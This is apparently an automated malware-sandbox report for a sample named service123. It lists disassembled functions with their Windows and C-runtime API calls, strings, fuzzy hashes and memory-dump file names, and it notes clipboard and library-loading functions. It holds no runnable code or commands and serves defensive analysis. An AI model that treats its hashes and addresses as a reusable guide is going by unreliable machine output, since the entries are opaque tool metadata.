Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: a659ea34683c2b767fad2bdbd50d6d625b434a21ce78661de7c9ce7a44e0e499
Instruction ID: 81e262e6e94a83b6339dab90b196c73a90b2e7dfcfa070b07ae92e5f1db8f68a
Opcode Fuzzy Hash: a659ea34683c2b767fad2bdbd50d6d625b434a21ce78661de7c9ce7a44e0e499
Instruction Fuzzy Hash: EB019EB290938C8BC710BF79A60621EBFF4AA46610F414829DE9897E14DA30C454CBA3

Function 6C2373C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C237411
strlen.MSVCRT ref: 6C23742B
strlen.MSVCRT ref: 6C23747B
strlen.MSVCRT ref: 6C2374D8
strlen.MSVCRT ref: 6C23752C

Strings

*, xrefs: 6C237660
basic_string::append, xrefs: 6C2376CA, 6C2376D6, 6C2376E2, 6C2376EE

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen$strcmp
String ID: *$basic_string::append
API String ID: 551667898-3732199748
Opcode ID: 703eb5b1d3d464cedebc461151365fa6f66ab44f4b1ecaada9add389a1de828b
Instruction ID: 9d76df96a1a6adcab39b5cc8157c53a2a8eae632b139651ba77a9ec7d5394d43
Opcode Fuzzy Hash: 703eb5b1d3d464cedebc461151365fa6f66ab44f4b1ecaada9add389a1de828b
Instruction Fuzzy Hash: 34A148B1A08719CFDB00EF28C19065EBBF1BF49308F51896DD8989BB54D735E849CB92

Function 6C2B3DD0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C2B3E6F
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C24E9CE), ref: 6C2B3ED3
memmove.MSVCRT ref: 6C2B3F0B
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C24E9CE), ref: 6C2B3F7A

Strings

basic_string::_M_replace, xrefs: 6C2B40FF

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: a278e5bc8e02c70607ef9cec35d6466d3a53bd0855c8a7ea8c5608f3e9f442e7
Instruction ID: 1958347620dab7f77cc6f5a922207aca8ec69c604f2af795ead4a83adc292f8e
Opcode Fuzzy Hash: a278e5bc8e02c70607ef9cec35d6466d3a53bd0855c8a7ea8c5608f3e9f442e7
Instruction Fuzzy Hash: 109117356093598FC304DF18C08095EBBF1BF89788F54892EF989A7724DB75E984CB82

Function 6C21E800 Relevance: 12.1, APIs: 8, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction ID: 91a67238fed6a5611778864a62dd6b7b2e35cc3800e3e39586bc7ff5b89e4b33
Opcode Fuzzy Hash: 1884a794d3d441725b09e7e72905d71cc32fb0140713b8c23ce069bb11cd822c
Instruction Fuzzy Hash: 0321C83195C20ECF9714CE19C88998BB7E5AFC6315B568915EE8447E28D330E88B87D2

Function 6C229BA6 Relevance: 12.1, APIs: 8, Instructions: 86clipboardCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 6C229BA9
IsClipboardFormatAvailable.USER32 ref: 6C229DDC
OpenClipboard.USER32 ref: 6C229DF0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: Clipboard$AvailableCloseFormatHandleOpen
String ID:
API String ID: 518195572-0
Opcode ID: 315b486a8541554b17a8e581e3a5c95fde70504c4af487ed61764356240f7b37
Instruction ID: 40cc801a87df7ab912e2e4c2927d7d7332beb8cdc6df036603a8e99fd7605022
Opcode Fuzzy Hash: 315b486a8541554b17a8e581e3a5c95fde70504c4af487ed61764356240f7b37
Instruction Fuzzy Hash: DD217FB2A08245CFEB10BF78D54916EBBF4AB46255F040939EC8996640EF39D058CB93

Function 006C1E70 Relevance: 12.1, APIs: 8, Instructions: 84COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 006C1EAF
signal.MSVCRT ref: 006C1EF6
signal.MSVCRT ref: 006C1F0F
signal.MSVCRT ref: 006C1F36
signal.MSVCRT ref: 006C1F72
signal.MSVCRT ref: 006C1FBF
signal.MSVCRT ref: 006C1FD5
signal.MSVCRT ref: 006C1FEB

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 5d52037e898e9c64b70a2669e9d44679957ed5ac11f33f62d16e7e6132daed06
Instruction ID: 9c891ff5c8b192e94d5ce055d6cccca7c3c075db154ce8c3a5d37e0b5a7aeb89
Opcode Fuzzy Hash: 5d52037e898e9c64b70a2669e9d44679957ed5ac11f33f62d16e7e6132daed06
Instruction Fuzzy Hash: D231E9705082008EE7607F648954B7EBAD6FB47358F15491EE8D8CF382CB79C8899B57

Function 006C4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 006C4378

Strings

Inf, xrefs: 006C4E35, 006C4E4D
NaN, xrefs: 006C4D3B
@, xrefs: 006C4647

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 928831f445d8c1e689a0ed4f40eb76ee2b609f4c084451b6c696c033bd5c00c7
Instruction ID: ef44b061f4c0173b54e17deda5cfa03bda47433a83c3b2f734c335d2ba539fc4
Opcode Fuzzy Hash: 928831f445d8c1e689a0ed4f40eb76ee2b609f4c084451b6c696c033bd5c00c7
Instruction Fuzzy Hash: 97F1907160C3958BD731CF24C4A0BBBBBE2FB85314F158A1DE9D987381DB3599068B86

Function 6C224A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C224A48

Strings

NaN, xrefs: 6C22540B
@, xrefs: 6C224D17
Inf, xrefs: 6C225505, 6C22551D

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 13401e26fd38d88f8e922ad194639f970377813601ea50d65863126095a2c7c8
Instruction ID: b1545918d00a67796998893fced9e067a1a8d6c93686b3a26a944f17e64ad009
Opcode Fuzzy Hash: 13401e26fd38d88f8e922ad194639f970377813601ea50d65863126095a2c7c8
Instruction Fuzzy Hash: B8F1C17160C39A8BD7218F28C45079BBBE1BF85319F158A2DECDC87785D7399906CB82

Function 006C3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 006C34C6
@, xrefs: 006C342A

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: aae52172fb33380e642498815ab8c7c9d30707ab3831d84401368a305ffb77d6
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 38C12971A006658BDB15CF68C484BEDBBF2EF88314F19C25DE858AB345D734EA46CB90

Function 6C223830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 6C223AFA
0, xrefs: 6C223B96

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 07e6a7f7e9384d1ed11772f48048f6fe5a210a269c186a89ea9839c1dda7062a
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 5BC16C71E1421A8BDB04CF6CC48478DBBF9BF89314F298269EC54AB795D378E845CB90

Function 6C23B810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C23B836
memcmp.MSVCRT ref: 6C23B85A
memcmp.MSVCRT ref: 6C23B8CD
memcmp.MSVCRT ref: 6C23B93F

Part of subcall function 6C2DADB0: strlen.MSVCRT ref: 6C2DADBE

memcmp.MSVCRT ref: 6C23B9D7

Strings

basic_string::compare, xrefs: 6C23B879, 6C23B8EA, 6C23B95D, 6C23B9F6, 6C23BA12
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C23B881, 6C23B8F2, 6C23B965, 6C23B9FE, 6C23BA1A

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: cc9a32707ede49db198bd71237db939c8f6ce1cc5bbc18665f83a8e8bdde3faa
Instruction ID: 62a086e94f81a330626fdb7b64dea3ec889d1e60d00face21299f591908d92dc
Opcode Fuzzy Hash: cc9a32707ede49db198bd71237db939c8f6ce1cc5bbc18665f83a8e8bdde3faa
Instruction Fuzzy Hash: 876133B560A3299FC300EF29C98195AFBE5BF88644F15892DF8C8C7711E371E845CB92

Function 6C237710 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C283320: memset.MSVCRT ref: 6C283365

strcmp.MSVCRT ref: 6C237771
strlen.MSVCRT ref: 6C23778C
strlen.MSVCRT ref: 6C2377D3
strlen.MSVCRT ref: 6C237844
strlen.MSVCRT ref: 6C2378B2

Strings

*, xrefs: 6C237990

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: 267bb29450ea2bc1550bbf26ab8e07874d4142317a93fbc5dcf29e320961f3d6
Instruction ID: 61d8462fb1f85989a7dec7cb5e37ab9b23b74f03aeb7a3b4001f0a46c471badf
Opcode Fuzzy Hash: 267bb29450ea2bc1550bbf26ab8e07874d4142317a93fbc5dcf29e320961f3d6
Instruction Fuzzy Hash: 158155B0A06615CFDB00EF28C198A5AFBF5FF89714F0185ADDC599B750DB35A809CB82

Function 6C21E8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 9aabbae1fa4b91bcab01d23f6f2f79207fb5f83b47b1ca94a0ccb9f29fa8af38
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: D4518B7050D70E8FC710CF19C88865AB7E0BF8A309F444A5AFE989BE50D730D94ACB96

Function 6C21E340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C21E487
WaitForSingleObject.KERNEL32 ref: 6C21E4C8

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: f71bad55d453ed001c08aed8f7be3fc056afca92edf4e1467ddfc302e85f37bd
Instruction ID: c934652d21ac60e6ed399281788b5d52c03dc4262b7538752e735dc3647ac44d
Opcode Fuzzy Hash: f71bad55d453ed001c08aed8f7be3fc056afca92edf4e1467ddfc302e85f37bd
Instruction Fuzzy Hash: 11516970709346CFDB20DF2ACA8C76677F4AB4A319F044528EE5887E80DB74D445CBA2

Function 6C2201F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C220209
memcpy.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C22022D
malloc.MSVCRT ref: 6C220247
memset.MSVCRT ref: 6C220275
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: c131386e9d49785517729eb15be7e5fe32a57e191a463192a8caa178958ffe94
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 00118FB560534D9ED700BF68D481899B7E4EB44259F41893EDC4887B00E734D918CA61

Function 006C8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 006C812C
GetProcAddress.KERNEL32 ref: 006C814C
GetProcAddress.KERNEL32 ref: 006C818B

Strings

msvcrt.dll, xrefs: 006C8125
__lc_codepage, xrefs: 006C8180
___lc_codepage_func, xrefs: 006C8144

Memory Dump Source

Source File: 00000005.00000002.3291178765.00000000006C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000005.00000002.3291157159.00000000006C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291198404.00000000006CA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291248714.00000000006CE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.3291274007.00000000006D1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 3fb667bacf413851ab98e2b6ed2c7c734515d5a7269e69d1737e3b8b552d5db6
Instruction ID: 8d1ca9b96fe526e1940cd02d863d2d3959b716cb23593b205b0245211c9788fe
Opcode Fuzzy Hash: 3fb667bacf413851ab98e2b6ed2c7c734515d5a7269e69d1737e3b8b552d5db6
Instruction Fuzzy Hash: F7F049B19042158F9B206F78AD08BBB7EF2EA04314F09453EC885C7300EA748455CBB3

Function 6C229171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C22917C
GetProcAddress.KERNEL32 ref: 6C22919C
GetProcAddress.KERNEL32 ref: 6C2291DB

Strings

__lc_codepage, xrefs: 6C2291D0
___lc_codepage_func, xrefs: 6C229194
msvcrt.dll, xrefs: 6C229175

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 9930005a6dd6cfa4beb72bc823c77b91de7df55f1dfe351fcd533129593d07e5
Instruction ID: 346d4dc2b26e2700018c1e8f9f3ca46fd647a35fa3af1d2a0d55f214d27a7f81
Opcode Fuzzy Hash: 9930005a6dd6cfa4beb72bc823c77b91de7df55f1dfe351fcd533129593d07e5
Instruction Fuzzy Hash: 2BF096B1A8530D8FEB00BF3D9A0A25ABBF4A605221F50053DDC98C7740E674C421CBA7

Function 6C21EA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: e64e55256649d7057a99f8e9154dfbb74dc2096b664003258b2a345bc404d54f
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 7AB01231CEE32DCA4520657C0955485A2C9A62B3453845843CF4A73D08C331E0474452

Function 6C2B4AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C2BB8AE), ref: 6C2B4B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C2BB8AE), ref: 6C2B4BA5

Memory Dump Source

